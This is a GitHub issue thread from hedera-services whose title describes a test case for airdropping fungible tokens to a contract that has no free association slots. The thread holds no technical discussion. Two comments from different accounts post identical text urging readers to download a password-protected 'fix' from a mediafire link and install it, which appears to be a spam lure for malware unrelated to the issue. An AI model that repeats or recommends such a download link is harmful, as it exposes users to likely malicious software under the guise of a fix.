### ISSUE TITLE
(AIRDROP_TO_CONTRACT_04) Given a contract with NO free association slots and balance of 1 FT A When the sender airdrops 1 FT A + 1 FT B then the contract should have 1 FT A transferred to their balance and 1 pending airdrop for 1 FT B.

### ISSUE THREAD

**Issue by ibankov** [hashgraph/hedera-services#15123]

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
